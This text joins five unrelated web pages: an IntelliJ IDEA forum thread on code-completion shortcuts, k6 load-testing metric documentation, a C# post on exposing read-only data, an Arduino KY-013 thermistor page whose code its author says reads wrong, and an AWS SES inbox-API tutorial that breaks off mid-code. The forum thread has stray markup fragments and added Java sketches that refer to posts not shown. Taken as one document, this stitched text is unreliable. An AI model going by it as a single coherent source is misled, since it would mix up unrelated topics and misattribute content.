As for class name completion, you usually only want to use the classes you have already imported. It would be extremely annoying not to have a quick way to expand "FileI" to "FileInputStream" because some irrelevant classes like com.sun.imageio.spi.FileImageOutputStreamSpi get in the way, when you haven't imported them and you're not interested in them. On the other hand, when you have not yet imported FileInputStream, it would be quite annoying to have to type the entire name, wait for the intention popup, and then let IDEA import it. Not to mention if you can't remember exactly how the class name is spelled. So clearly there are cases when you want all class names (in some sense, all global identifiers) to be available in the list. Again, this seems like it would be best solved by different keyboard shortcuts.

I thought about what would happen if you let ctrl-space pop up the "smart" completion list and then pressing it again would expand the list to contain the larger non-smart completion list, but then you could not auto-complete when the smart completion list only had one entry, so it would not really work.

Although one inconsistency that could perhaps be addressed is that ctrl-space does not always yield a superset of ctrl-shift-space. Consider this simple class, where again | is the caret:

public class Foo {
    public static void main(String[] args) {
        foo(|);
    }

    static void foo(String[] x) {}
}

If you press ctrl-shift-space, "args" is auto-completed. If you press ctrl-space, you get no completions at all.
If this was changed so that ctrl-space always showed all completions, even if the list happened to be quite long, then you could consistently use ctrl-space and you would be certain to get all the completions you could want (and possibly some more, so you'll have to spend a little bit more time to read the list and select one).

Jonas Kvarnström wrote:
>> I find the 3 different "code completion" keys (Ctrl-Space,
>> Ctrl-Shift-Space, & Ctrl-Alt-Space) to be very confusing.

Cycling from local to general could cover that as well.

Jon

This is getting off topic. I agree with this, and with using only one key for basic+smart type completion: it has become automatic pressing control-shift-space (or rather alt-space, as I remapped it) followed by control-space. But I wouldn't use the completion key - too error prone. Using the invocation key is better: control-space -> smart-type, again -> basic -> again -> classes; control-shift-space would navigate in the reverse way. Or maybe: control-space changes between smart-type/basic, and control-alt-space continues to be only class completion.

Also: If a list is empty, automatically show the next broader list: if smart type is chosen and no list is available, automatically show the basic completion list.

No, Control-space or Control-shift-space again :)

Also: Clarify exactly what each level of code completion does. My understanding now (as it seems to not be the same everywhere) of what it should be:

Basic: visible names (imports + fields + locals + methods).
Smart type: visible names filtered by appropriate return/parameter/assignation type - almost forgotten: and smart live templates.
Class: every visible class in the system.

Carlos

And after new, if it's an assignment/parameter/... And after catch and throw (again, maybe it works already)...

Carlos Costa e Silva wrote:

It isn't important to me what key combo makes it happen.
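The chained-expression scenario Jonas describes — completing processFoo(abc.|) all the way to processFoo(abc.getBar().getFoo()) — can be sketched in plain Java. The Abc, Bar and getFooDirectly names below are hypothetical stand-ins invented for illustration; nothing here comes from IDEA's own API:

```java
// Hypothetical types mirroring the processFoo(abc.|) discussion above.
class Foo { }

class Bar {
    Foo getFoo() { return new Foo(); }
}

class Abc {
    Bar getBar() { return new Bar(); }          // yields a Foo only via a chain
    Foo getFooDirectly() { return new Foo(); }  // yields a Foo directly
}

public class ChainDemo {
    static String processFoo(Foo f) { return "processed"; }

    public static void main(String[] args) {
        Abc abc = new Abc();
        // "Deep" smart completion would offer getBar() at abc.| because the
        // chain abc.getBar().getFoo() eventually produces the expected Foo:
        System.out.println(processFoo(abc.getBar().getFoo()));
        // Strict smart completion would offer only getFooDirectly(), the one
        // method whose return type is Foo itself:
        System.out.println(processFoo(abc.getFooDirectly()));
    }
}
```

Both calls compile and print "processed"; the two usage patterns differ only in which methods a completion popup should list at the caret.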
FYI-- for anyone who missed it, you can vote for the as yet not completely fleshed out feature at

The reversing option with a meta-key is new to me and a possibility. I'm not sure if I would have them separate or not. Doesn't it seem like context could help decide? Maybe if the context called for a class or interface, it would start with narrow class completion (already imported and matching type if type narrow context), broader class completion, then on to basic.

Yes.

Sure. Agree on getting it all clarified. This would help to decide how it all could fit together in a cycle and whether it should be cleaned up to better support cycling.

Jon

Igor Kuralenok wrote:

Filter out interfaces you already implement.
Filter out superinterfaces of interfaces you already implement.

In extends for interfaces:
Filter out any interface(s) you already extend
Probably filter out superinterfaces of interfaces you already extend

Not sure I completely understand the question. Are you only asking about where class/interface filtering can be inherently applied or are you open to having a cycle on class name completion that has a narrow list first time that is only already imported stuff and then a broader list that includes all possibilities?

Thanks, Jon

Jon Steelman wrote:

Yes, I suppose it could. Actually I started writing that message convinced that there was no way of improving the current completion keys and then I partially changed my mind while writing it. Now you've changed it even further :) It's a bit hard to judge how well it would work "in theory", so it would be very interesting to see something like this implemented in an EAP release so that we could test it in practice.

Do what (I think) JBuilder used to do. Include getBar() in the list, but sort the list for relevance - members of the type or descendants of the type required come first, so that getFoo() is before getBar() (and is probably preselected too), but getBar() is still accessible from that list.
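The JBuilder-style relevance ordering just described — candidates whose return type matches the expected type sort first, but nothing is removed from the list — can be sketched like this. The Candidate class and all names in it are invented for illustration, not part of any IDE API:

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Comparator;
import java.util.List;

public class RelevanceSort {
    // Invented stand-in for a completion candidate: a method name plus its return type.
    static class Candidate {
        final String name;
        final String returnType;
        Candidate(String name, String returnType) {
            this.name = name;
            this.returnType = returnType;
        }
    }

    // Stable sort: candidates returning the expected type come first; all
    // other candidates keep their relative order and remain reachable.
    static List<Candidate> sortForExpectedType(List<Candidate> candidates, String expected) {
        List<Candidate> sorted = new ArrayList<>(candidates);
        sorted.sort(Comparator.comparingInt(
                (Candidate c) -> c.returnType.equals(expected) ? 0 : 1));
        return sorted;
    }

    public static void main(String[] args) {
        List<Candidate> sorted = sortForExpectedType(
                Arrays.asList(new Candidate("getBar", "Bar"),
                              new Candidate("getFoo", "Foo")),
                "Foo");
        // getFoo ranks first because it returns the expected Foo;
        // getBar is still present, just lower in the list.
        System.out.println(sorted.get(0).name);
    }
}
```

Because List.sort is guaranteed stable, the non-matching candidates never shuffle among themselves — only the matching ones float to the top, which is exactly the "preselected but nothing hidden" behavior described above.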
Incidentally, JBuilder only had one key for smart complete and it was sufficient; however JBuilder did not include Class Completion for non-imported classes. When the Amis chaps implemented this with Productivity, they added another key stroke for that, which I think is right as it's a quite separate action. So 3 different strokes is too many, but 2 are definitely needed.

N.

Jonas Kvarnström wrote:

Agreed on needing to see it in EAP. Say, does the openapi have enough power to implement this on top of all the current code completion features or would IntelliJ folks have to do it?

Jon

Hi Guys!

Sorry for a long silence. I'll comment your suggestions in separate mail. Here I just want to answer the only question: No. I think not. I think we should extend access to completion features in OpenAPI but this is my personal opinion and we need to discuss this with other members of our team first.

IK

Hi All!

Ok. I agree with these features. When I wrote that letter I was thinking on possible class name completion features. Summarizing the discussion, it'd be nice to have:

-- Shortcut that cycles through all completions.
-- A key that extends/narrows a lookup list in completion.

Good things:
-- One shortcut for all kinds of completion

Bad things:
-- No "completion on one keystroke" - what kind of completion should we choose?
-- More complicated navigation for newbies (this is arguable but this is just my point of view :)).

I have the following idea for completion enhancement: all shortcuts will stay the same except one thing: in normal completion lookup, on left/right key the completion type will be changed. Agree?

Thanks, IK

Forgot the filter after "instanceof":
- When the left type is a class, filter only subclasses or interfaces that are implemented by subclasses.
- When the left type is an interface, all classes and subclasses of this interface should be filtered out.

Tom

> lookup on left/right key the completion type will be changed.
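Tom's instanceof filter can be illustrated with a tiny hypothetical hierarchy (none of these names come from the thread). For a variable of class type Animal, only Animal's subclasses, or interfaces implemented by some subclass, can ever make the instanceof test true — so those are the only sensible completion candidates:

```java
// Invented hierarchy: Dog is the only Animal subclass, and it implements Pet.
interface Pet { }
class Animal { }
class Dog extends Animal implements Pet { }
// A test against an unrelated class (say, "a instanceof Thread") is rejected
// by javac as inconvertible types, which is exactly why completion should
// filter such names out after "instanceof".

public class InstanceofDemo {
    static String describe(Animal a) {
        if (a instanceof Dog) return "dog"; // subclass: sensible candidate
        if (a instanceof Pet) return "pet"; // interface implemented by a subclass
        return "plain animal";
    }

    public static void main(String[] args) {
        System.out.println(describe(new Dog()));    // dog
        System.out.println(describe(new Animal())); // plain animal
    }
}
```

The mirror case for an interface-typed variable follows the same logic: only implementing classes and their subtypes can satisfy the test.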
> I'd see subsequent CtrlSpace (CtrlShift+Space) commands as being more intuitive (limiting the number of key combinations one has to remember as well), but that's just me. If you go with the arrow keys could we have the key binding exposed so we can re-map it? Thx. Andrei Good idea! Ok. This will be assignable inside completion settings. Please ensure, that one can map the completion to the ]]> key. Tom The completion shortcuts and their binding remain the same. I think that's reasonable to have a separate binding inside completion settings for changing completion type inside lookup. IK Thomas Singer wrote: I would like that too, but this makes it a little more complicated if you also want live templates to work into the mix. For example, where do we want live templates to go to the completion cycle? Jon Igor Kuralenok wrote: > Yes. Depending on the keys involved, I think you can still do the one keystroke completion when the first, narrowest lookup list has exactly one match. For example, if a meta key like Shift is involved, they just let go of the keys and that accepts the completion on one keystroke. However, if they want to cycle to broader, they would keep holding down the Shift then strike the other key(s) that originally invoked completion. A single key completion with something like tab that has no meta-key might not be able to work this way unless you did a timer than waited for another tab within a limited period to represent cycling. This would be good in that a power user can start the completion where they want it but still be able to cycle. In addition to this, however, I was imagining a completion system that did it's best to figure out the most appropriate completion (possibly including live templates) given the context. 
So, in addition to all the existing specific completion entry points you're proposing, it would be nice if there were a general completion key sequence that selects the most likely, narrowest list and allows you to cycle out and back around from there. The universal completion would clearly need added intelligence to figure out which list to select to start.

Thanks, Jon

Hmm, I hadn't thought about live templates. Does anybody really use ]]> and ]]> to invoke different live templates? Maybe there could be one (customizable) shortcut to invoke them?

Tom

> lookup on left/right key the completion type will be changed.
> Yes.

Also, if a completion is empty, automatically show the "next" one. I really dislike Ctrl+Shift+Enter resulting in no completion list.
https://intellij-support.jetbrains.com/hc/en-us/community/posts/206319859-Class-name-completion?page=1
This section covers the important aspect of metrics management in k6: how and what kind of metrics k6 collects automatically (built-in metrics), and what custom metrics you can make k6 collect.

The built-in metrics are the ones printed to stdout when you run the simplest possible k6 test, e.g.:

k6 run github.com/loadimpact/k6/samples/http_get.js

This prints a summary of the collected metrics at the end of the run. All the http_req_... lines, and the ones after them, are built-in metrics that get written to stdout at the end of a test.

The following six built-in metrics will always be collected by k6:

- vus (Gauge): Current number of active virtual users.
- vus_max (Gauge): Max possible number of virtual users (VU resources are preallocated, to ensure performance will not be affected when scaling up the load level).
- iterations (Counter): The aggregate number of times the VUs in the test have executed the JS script (the default function). Or, in case the test is not using a JS script but accessing a single URL, the number of times the VUs have requested that URL.
- data_received (Counter): The amount of received data.
- data_sent (Counter): The amount of data sent.
- checks (Rate): Number of failed checks.

There are also built-in metrics that will only be generated when/if HTTP requests are made:

- http_reqs (Counter): How many HTTP requests k6 has generated, in total.
- http_req_blocked (Trend, float): Time spent blocked (waiting for a free TCP connection slot) before initiating the request.
- http_req_looking_up (Trend, float): Time spent looking up the remote host name in DNS.
- http_req_connecting (Trend, float): Time spent establishing a TCP connection to the remote host.
- http_req_tls_handshaking (Trend): Time spent handshaking a TLS session with the remote host.
- http_req_sending (Trend, float): Time spent sending data to the remote host.
- http_req_waiting (Trend, float): Time spent waiting for a response from the remote host (a.k.a. "time to first byte", or "TTFB").
- http_req_receiving (Trend, float): Time spent receiving response data from the remote host.
- http_req_duration (Trend, float): Total time for the request. It's equal to http_req_sending + http_req_waiting + http_req_receiving (i.e. how long the remote server took to process the request and respond, without the initial DNS lookup/connection times).

Accessing HTTP timings from a script

If you want to access the timing information from an individual HTTP request, the built-in HTTP timing metrics are also available in the HTTP Response object:

import http from "k6/http";

export default function() {
    var res = http.get("");
    console.log("Response time was " + String(res.timings.duration) + " ms");
};

In the above snippet, res is an HTTP Response object containing:

- res.body (string containing the HTTP response body)
- res.headers (object containing header-name/header-value pairs)
- res.status (integer containing the HTTP response code received from the server)
- res.timings (object containing HTTP timing information for the request, in ms):
  - res.timings.blocked = http_req_blocked
  - res.timings.looking_up = http_req_looking_up
  - res.timings.connecting = http_req_connecting
  - res.timings.sending = http_req_sending
  - res.timings.waiting = http_req_waiting
  - res.timings.receiving = http_req_receiving
  - res.timings.duration = http_req_duration

You can also create your own metrics, which are reported at the end of a load test, just like HTTP timings:

import http from "k6/http";
import { Trend } from "k6/metrics";

var myTrend = new Trend("waiting_time");

export default function() {
    var r = http.get("");
    myTrend.add(r.timings.waiting);
};

The above code will create a Trend metric named "waiting_time", referred to in the code using the variable name myTrend, and add the waiting time of each request to it. Custom metrics are reported at the end of a test, alongside the built-in ones.

All metrics (both the built-in ones and the custom ones) have a type. There are four different metric types: Counter, Gauge, Rate and Trend.
Counter (cumulative metric)

import { Counter } from "k6/metrics";

var myCounter = new Counter("my_counter");

export default function() {
    myCounter.add(1);
    myCounter.add(2);
};

If you run this for one single iteration (i.e. without specifying --iterations or --duration), the end-of-test value of my_counter will be 3. Note that there is currently no way of accessing the value of any custom metric from within JavaScript. Note also that counters that have the value zero (0) at the end of a test are a special case: they will NOT be printed to the stdout summary.

Gauge (keep the latest value only)

import { Gauge } from "k6/metrics";

var myGauge = new Gauge("my_gauge");

export default function() {
    myGauge.add(3);
    myGauge.add(1);
    myGauge.add(2);
};

The value of my_gauge will be 2 at the end of the test. As with the Counter metric above, a Gauge with the value zero (0) will NOT be printed to the stdout summary at the end of the test.

Trend (collect trend statistics (min/max/avg/percentiles) for a series of values)

import { Trend } from "k6/metrics";

var myTrend = new Trend("my_trend");

export default function() {
    myTrend.add(1);
    myTrend.add(2);
};

A Trend metric is really a container that holds a set of sample values, and which we can ask to output statistics (min, max, average, median or percentiles) about those samples. By default, k6 will print average, min, max, median, 90th percentile and 95th percentile.

Rate (keeps track of the percentage of values in a series that are non-zero)

import { Rate } from "k6/metrics";

var myRate = new Rate("my_rate");

export default function() {
    myRate.add(true);
    myRate.add(false);
    myRate.add(1);
    myRate.add(0);
};

The value of my_rate at the end of the test will be 50%, indicating that half of the values added to the metric were non-zero.
Notes

- Custom metrics are only collected from VU threads at the end of a VU iteration, which means that for long-running scripts you may not see any custom metrics until a while into the test.

If you use Load Impact Insights, it can graph all of these metrics. By default it shows only very basic metrics, but you can add both system and custom metrics as more graphs, or as different series on the same graph.
https://docs.k6.io/docs/result-metrics
. One of the things I sort-of miss from C++ (it has its good and bad) is the const modifier. Yes, while it’s true that we have a const modifier in C# (as well as readonly), but it’s not quite as robust. Many times you’ll want to return an internal member of a class but not want it to be directly modifiable by the user of that class. This article discusses how to present simple types as read-only. Note: I’m deliberately avoiding creating read-only views of collections in this particular article, but I will cover that in a follow-up article as there are multiple ways to achieve that as well. For the purposes of this article we will assume the types are all fairly flat with no collections. In C++ you can mark an identifier (even parameters) of any type as const and you cannot call any mutable operations on that identifier. Now, to be fair, C++ makes you jump through hoops to gain that distinction. You have to mark every method that does not mutate the type as const as well to indicate that the method will not mutate the type: 1: // C++ code, sorry for all you C#-ers 2: class Queue 3: { 4: private: 5: // ... 6: 7: public: 8: // const modifier here says Count() will not modify Queue. 9: int Count() const; 10: 11: // no const modifier, so Pop can modify Queue. 12: void Pop(); 13: 14: // ... 15: }; So, if you have two different identifiers (even parameters) of type Queue: 1: // can call any methods on nonConstQueue, but only explicitly marked 2: // const methods on constQueue. 3: void DoSomethingWithTwoQueues(Queue& nonConstQueue, const Queue& constQueue) 4: { 5: // ... 6: } In this case, nonConstQueue is not declared const, so you can call any Queue method. However, constQueue, is declared const, so you can only call methods that have explicitly been marked const. Now, in C++ you can cheat this by casting away const-ness or marking members as mutable. But on the whole this gives you an easy way to present a read-only view of mutable data. So, how does this relate to C#? 
Well, in C# you can mark identifiers as const but only if they are compile-time constants. This means that the constant must be a numeric literal, boolean literal, string literal, char literal, or null for reference types. So what about readonly? In C#, readonly is akin to Java's final modifier in that it works well for value types (numeric, char, struct) and immutable types (string), but for any mutable reference type it is somewhat ineffective (for a larger discussion of const versus readonly, see here). That is, the reference is readonly, but what it refers to is not. So if you had:

1: public class Sender
2: {
3:     private readonly List<string> _hosts;
4:     ...
5: }

This prevents you from saying:

1: // cannot change what we refer to, _hosts is readonly.
2: _hosts = new List<string>();

But you can mutate the existing list:

1: // can do this, we aren't changing the reference (which is readonly)
2: _hosts.Clear();

This can lead to confusion for the novice developer. To be fair, though, I can totally see why C# (and Java) took this route, because C++ const-correctness can be extremely maddening. Essentially, as mentioned before, you have to mark every method as to whether or not it will mutate the class. So what are we to do if we want to present truly read-only data? Well, you have several options. None of these are perfect, in any sense, but any of them will give you a reasonable level of read-only protection.

One of the things you can do to make a type harder to modify is have it present a read-only interface. Note that I'm not talking about the readonly keyword, but an interface that only exposes non-mutable operations. For example, let's say you had a POCO like Product:

1: public class Product
2: {
3:     public string Name { get; set; }
4:     public int Id { get; set; }
5:     public string Category { get; set; }
6: }

Any time an instance of this class is exposed, the members can be altered.
Thus even if you had:

 1: public class CatalogEntry
 2: {
 3:     private readonly Product _product;
 4:     private readonly double _price;
 5:
 6:     // incidentally we could have done this with a private setter
 7:     // instead of backing field, but wanted to illustrate using readonly
 8:     public Product Product { get { return _product; } }
 9:     public double Price { get { return _price; } }
10:
11:     public CatalogEntry(Product product, double price)
12:     {
13:         _product = product;
14:         _price = price;
15:     }
16: }

There's nothing to stop you from saying:

1: var entry = new CatalogEntry(new Product { Id = 3, Name = "Widget", Category = "Theoretical" }, 3.14);
2:
3: // allowed, _product is readonly, but _product.Name is not!
4: entry.Product.Name = "Ooops";

So how can we mitigate this? Well, we could provide a read-only interface for our product such as:

 1: // create an interface without mutators.
 2: public interface IReadOnlyProduct
 3: {
 4:     string Name { get; }
 5:     int Id { get; }
 6:     string Category { get; }
 7: }
 8:
 9: // POCO class implements the read-only interface and adds mutators
10: public class Product : IReadOnlyProduct
11: {
12:     public string Name { get; set; }
13:     public int Id { get; set; }
14:     public string Category { get; set; }
15: }

Now, with this read-only interface, we can make classes that want to use Product, but keep it from being altered, expose only the IReadOnlyProduct interface:

8: public IReadOnlyProduct Product { get { return _product; } }

Now, if you attempt to directly modify Product, you will get a syntax error because there are no setters exposed:

3: // Now, this is a compiler error because IReadOnlyProduct does not expose a Name setter.
4: entry.Product.Name = "Ooops";

So is this perfect? Not really. The main problems with this approach are that you have to create read-only interfaces for everything you want to protect, and that there's nothing to prevent a user of your class from directly casting it back to Product and then modifying the values. As such, it's probably not the best approach.
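The cast-away loophole isn't unique to C#. Since the article already draws the parallel to Java's final modifier, here is a runnable Java sketch of the same read-only-interface approach and its weakness (the class and member names are hypothetical, chosen to mirror the article's example):

```java
// Java analogue of the C# read-only interface approach, showing the
// same cast-away loophole the article describes.
interface ReadOnlyProduct {
    String getName();
    int getId();
}

class Product implements ReadOnlyProduct {
    private String name;
    private final int id;

    Product(int id, String name) {
        this.id = id;
        this.name = name;
    }

    public String getName() { return name; }
    public int getId() { return id; }
    public void setName(String name) { this.name = name; }
}

public class ReadOnlyDemo {
    public static void main(String[] args) {
        ReadOnlyProduct view = new Product(3, "Widget");
        // view.setName("Ooops");          // does not compile: not on the interface
        ((Product) view).setName("Ooops"); // but a downcast defeats the protection
        System.out.println(view.getName());
    }
}
```

The takeaway is the same as in the C# discussion: the interface hides the setters, but a downcast restores full access, so this is a convention rather than a guarantee.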
One of the other options we have is to make the type a struct. Remember that struct types are value types and thus any time you pass them around (which includes returning them from property gets) you pass them by value, which makes a full copy. Since you are passing a copy, if the user chooses to modify the copy that is their business, but it will not affect your copy. 1: // now makes a struct, type is now pass-by-value. 2: public struct Product 4: public string Name { get; set; } 5: public int Id { get; set; } 6: public string Category { get; set; } Now with our CatalogEntry, we have: 3: // making private setters to illustrate can do either way 4: public Product Product { get; private set; } 5: public double Price { get; private set; } 7: public CatalogEntry(Product product, double price) 8: { 9: Product = product; 10: Price = price; 11: } 12: } Now, if we attempt to alter the Product returned: 1: var entry = new CatalogEntry(new Product {Id = 3, Name = "Widget", Category = "Theoretical"}, 3.14); 3: // compiler gives us an error saying cannot set Product Name because "not a variable". We get a nice compiler error saying we can’t modify the Product Name field because the Product is returned by value and is a local copy which cannot be modified. Now, you can do this: 3: // you can do this... 4: var product = entry.Product; 6: // but you're modifying a copy and it doesn't affect original. 7: product.Name = "Ooops"; But this is rather benign because you at that point product is a copy of entry’s Product and thus the original is unaltered. So, a struct gives you a bit better of protection, but it’s not a panacea. The thing to remember is that struct is not class and there are major differences between the two (I have an entry with a table of differences here). One of the major points being it is always passed by value, which can be heavy if your type has more than a few properties. 
Also, this method does not protect you if you are exposing a mutable reference type as a property inside the struct. This is because the copy of the struct is shallow, only the reference is copied and not what it refers to. This is fine for immutable types (like string), but if you expose a mutable reference type, that can still be changed. One of the ways you can also create a read-only type is to make the type immutable. That is, once the type has received its initial value, it cannot be changed. In C#, strings (among others) are immutable. Any operation you perform that would change the string actually returns a new string instead. This method can be used either in plus of using struct or in addition to it. So, how do you create an immutable type? Basically you would take in all the information necessary in the constructor of the type, and then only expose non-mutating methods and property gets: 3: // all properties have private sets so only the class itself can change them. 4: public string Name { get; private set; } 5: public int Id { get; private set; } 6: public string Category { get; private set; } 7: 8: // constructor takes (or calculates) all it needs and sets 9: public Product(int id, string name, string category) 10: { 11: Id = id; 12: Name = name; 13: Category = category; 14: } So now, using the same CatalogEntry as before, we would have: 1: var entry = new CatalogEntry(new Product(3, "Widget", "Theoretical"), 3.14); 3: // can't do this, Name doesn't have get exposed. Notice, this seems very similar to exposing a read-only interface. The difference being that this cannot be cast to anything to get at the private members. Since the type itself protects the sets, they cannot be accessed and you will get a compiler error. So what’s the down-side to this? Well, you have to specify pretty much everything in the constructor, so if your class contains a lot of properties, you can have a very messy constructor. 
Plus, because we have to pass all values in the constructor, we can't use object initializers for the properties. To me this makes the code less readable. For example, in the code snippet above, is "Widget" the name, or the category? Same with "Theoretical"? You can get around this by using named parameters in C#. C# named parameters allow you to pass a parameter by its name instead of by position. Now, that's not to say you can't put a parameter in the right position and name it as well, but it does allow that flexibility. The nice part of this is you can use it to remove ambiguity:

1: var entry = new CatalogEntry(new Product(3, name: "Widget", category: "Theoretical"), 3.14);

Is it perfect? No, but oftentimes an immutable type can be your best protection.

So, we've seen three of several ways to create read-only data in C#. They all have their pros and cons, and some may be more applicable in some situations than others. In summary: a read-only interface is easy to add but can be cast away; a struct hands out copies but is heavier to pass around and doesn't protect nested mutable references; and an immutable type gives the strongest protection at the cost of a constructor-heavy design. Until C# gives us a way to return a constant form of a mutable reference type, these are a few of the tools at our disposal.

Print | posted on Thursday, October 28, 2010 6:21 PM | Filed Under [ My Blog C# Software .NET Fundamentals ]
http://geekswithblogs.net/BlackRabbitCoder/archive/2010/10/28/c.net-fundamentals-how-to-return-read-only-data.aspx
First, the module outputs temperature values in degrees Celsius, which can be read and displayed directly. It is easy to use and effective, and is therefore widely used in gardening, home alarm systems and other devices. Second, usage: now that we generally know how to use it, how does it actually measure temperature? With the parts above we can test how a simple thermistor helps us measure temperature.

Wiring:

Arduino pin A5 (analog) --> module S (signal)
Arduino pin GND --> module - (ground)
Arduino pin 5V --> module middle pin

This code didn't give the right values for this module: in a room at a comfortable temperature it reported about 10 C. That isn't right, so the calculation in the code (or the wiring) should be checked.

#include <math.h>

int sensorPin = A5; // select the input pin for the sensor

double Thermistor(int RawADC) {
  double Temp;
  Temp = log(10000.0 * ((1024.0 / RawADC) - 1));
  Temp = 1 / (0.001129148 + (0.000234125 + (0.0000000876741 * Temp * Temp)) * Temp);
  Temp = Temp - 273.15;               // Convert Kelvin to Celsius
  //Temp = (Temp * 9.0) / 5.0 + 32.0; // Convert Celsius to Fahrenheit
  return Temp;
}

void setup() {
  Serial.begin(9600);
}

void loop() {
  int readVal = analogRead(sensorPin);
  double temp = Thermistor(readVal);
  Serial.println(temp);      // display temperature
  //Serial.println(readVal); // display raw reading
  delay(500);
}
https://arduino.tkkrlab.nl/sensoren/ky-013/
Validate Email Workflows with a Serverless Inbox API

29 Sep 2020

In this article you'll learn how to build a serverless API that you can use to validate your email sending workflows. You will have access to unlimited inboxes for your domain, allowing you to use a new inbox for every test run. The working code is ready for you to deploy on GitHub.

With the AWS services Simple Email Service (SES) and API Gateway we can build a fully automated solution. Its pricing model fits most testing workloads into the free tier, and it can handle up to 10,000 mails per month for just $10. No maintenance or development required. It also allows you to stay in the SES sandbox.

Prerequisites

To deploy this solution, you should have an AWS account and some experience with the AWS CDK. I'll be using the TypeScript variant. This article uses CDK version 1.63.0. Let me know if anything breaks in newer versions!

To receive mail with SES you need a domain or subdomain. You can register a domain with Route53 or delegate from another provider. You can also use subdomains like mail-test.bahr.dev to receive mail if you already connected your apex domain (e.g. bahr.dev) with another mailserver.

High-Level Overview

The solution consists of two parts: the email receiver and the API that lets you access the received mail. The first writes to the database, the latter reads from it.

For the email receiver we use SES with Receipt Rules. We use those rules to store the raw payload and attachments in an S3 bucket, and send a nicely formed payload to a Lambda function which creates an entry in the DynamoDB table.

On the API side there's a single read operation which requires the recipient's email address. It can be parameterized to reduce the number of emails that will be returned. Old emails are automatically discarded with DynamoDB's time to live (TTL) feature, keeping the database small without any maintenance work.
Verify Domain with SES

To receive mail, you must be in control of a domain that you can register with SES. This can also be a subdomain, e.g. if you already use your apex domain (e.g. bahr.dev) for another mail service like Office 365.

The integration with SES is easiest if you have a hosted zone for your domain in Route53. To use domains from another provider like GoDaddy, I suggest that you set up a nameserver delegation. Once you have a hosted zone for your domain, go to the Domain Identity Management in SES and verify a new domain. There's also a short video where I verify a domain with SES.

Data Model

We'll use DynamoDB's partition and sort keys to enable two major features: receiving mail for many aliases, and receiving more than one mail for each alias. An alias is the front part in front-part@domain.com.

partition_key: recipient@address.com
sort_key: timestamp#uuid
ttl: timestamp

By combining a timestamp and a uuid we can sort and filter by the timestamp, while also guaranteeing that no two records will conflict with each other. The TTL helps us keep the table small, by letting DynamoDB remove old records.

I'm using Jeremy Daly's dynamodb-toolbox to model my database entities.
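Before looking at the model code, here's a tiny plain-JavaScript sketch of why the timestamp#uuid sort key gives both chronological ordering and a prefix-based "since" filter. The timestamps and shortened uuids are hard-coded for illustration; ISO-8601 strings sort chronologically as plain strings.

```javascript
// Illustration of the timestamp#uuid sort key described above.
// The uuid suffix keeps two mails that arrive in the same instant distinct.
function sortKey(timestamp, uuid) {
  return `${timestamp}#${uuid}`;
}

const keys = [
  sortKey('2020-09-29T10:00:00.000Z', 'aaa1'),
  sortKey('2020-09-29T09:00:00.000Z', 'bbb2'),
  sortKey('2020-09-29T09:00:00.000Z', 'ccc3'), // same second, different uuid
].sort(); // lexicographic sort == chronological order

// The read API's `since` parameter feeds a begins-with condition,
// i.e. a string-prefix match on the sort key:
const since = '2020-09-29T09';
const matches = keys.filter((key) => key.startsWith(since));

console.log(matches.length); // 2 (both 09:00 mails)
```

The same prefix comparison is what DynamoDB evaluates server-side, so the filtering happens in the query rather than in application code.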
import { Table, Entity } from 'dynamodb-toolbox';
import { v4 as uuid } from 'uuid';

// Require AWS SDK and instantiate DocumentClient
import * as DynamoDB from 'aws-sdk/clients/dynamodb';
const DocumentClient = new DynamoDB.DocumentClient();

// Instantiate a table
export const MailTable = new Table({
    // Specify table name (used by DynamoDB)
    name: process.env.TABLE,

    // Define partition and sort keys
    partitionKey: 'pk',
    sortKey: 'sk',

    // Add the DocumentClient
    DocumentClient
});

export const Mail = new Entity({
    name: 'Mail',
    attributes: {
        id: { partitionKey: true }, // recipient address
        sk: { hidden: true, sortKey: true, default: (data: any) => `${data.timestamp}#${uuid()}` },
        timestamp: { type: 'string' },
        from: { type: 'string' },
        to: { type: 'string' },
        subject: { type: 'string' },
        ttl: { type: 'number' },
    },
    table: MailTable
});

The Receiver

SES allows us to set up ReceiptRules which trigger actions when a new mail arrives. There are multiple actions to choose from, but we are mostly interested in the Lambda and S3 actions. We use the Lambda action to store details like the recipient, the sender and the subject in a DynamoDB table. With the S3 action we get the raw email delivered as a file into a bucket. This will be handy to later support more use cases like returning the mail's body and attachments.

Below you can see the abbreviated CDK code to set up the ReceiptRules. Please note that you have to activate the rule set in the AWS console. There is currently no high-level CDK construct for this, and I don't want you to accidentally override an existing rule set. There's a short video where I activate a rule set.
import * as cdk from '@aws-cdk/core';
import { Bucket } from '@aws-cdk/aws-s3';
import { Table } from '@aws-cdk/aws-dynamodb';
import { Function } from '@aws-cdk/aws-lambda';
import { ReceiptRuleSet } from '@aws-cdk/aws-ses';
import * as actions from '@aws-cdk/aws-ses-actions';

export class InboxApiStack extends cdk.Stack {
    constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
        super(scope, id, props);

        // your-domain.com
        const domain = process.env.INBOX_DOMAIN;

        const rawMailBucket = new Bucket(this, 'RawMail');
        const table = new Table(this, 'TempMailMetadata', { ... });

        const postProcessFunction = new Function(this, 'PostProcessor', {
            ...
            environment: {
                'TABLE': table.tableName,
            }
        });
        table.grantWriteData(postProcessFunction);

        // after deploying the cdk stack you need to activate this ruleset
        new ReceiptRuleSet(this, 'ReceiverRuleSet', {
            rules: [
                {
                    recipients: [domain],
                    actions: [
                        new actions.S3({ bucket: rawMailBucket }),
                        new actions.Lambda({ function: postProcessFunction })
                    ],
                }
            ]
        });
    }
}

With the above CDK code in place, let's take a look at the Lambda function that is triggered when a new mail arrives.

import { SESHandler } from 'aws-lambda';
// the model uses dynamodb-toolbox
import { Mail } from './model';

export const handler: SESHandler = async (event) => {
    for (const record of event.Records) {
        const mail = record.ses.mail;
        const from = mail.source;
        const subject = mail.commonHeaders.subject;
        const timestamp = mail.timestamp;

        const now = new Date();
        // set the ttl as 7 days into the future and
        // strip milliseconds (ddb expects seconds for the ttl)
        const ttl = now.setDate(now.getDate() + 7) / 1000;

        for (const to of mail.destination) {
            await Mail.put({ id: to, timestamp, from, to, subject, ttl });
        }
    }
}

The function above maps the SES event into one record per recipient and stores them together with a TTL attribute in the database. You can find the full source code on GitHub.
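The TTL arithmetic in the handler is easy to get subtly wrong, because DynamoDB's TTL feature expects epoch seconds while JavaScript dates work in milliseconds. Here's a standalone sketch of the same computation (the helper name is mine, not from the article), with an explicit floor so the attribute is always a whole number of seconds:

```javascript
// Epoch-seconds TTL, seven days from a given Date.
// DynamoDB TTL expects a Number attribute in epoch *seconds*;
// JavaScript Date arithmetic is in milliseconds, hence the / 1000.
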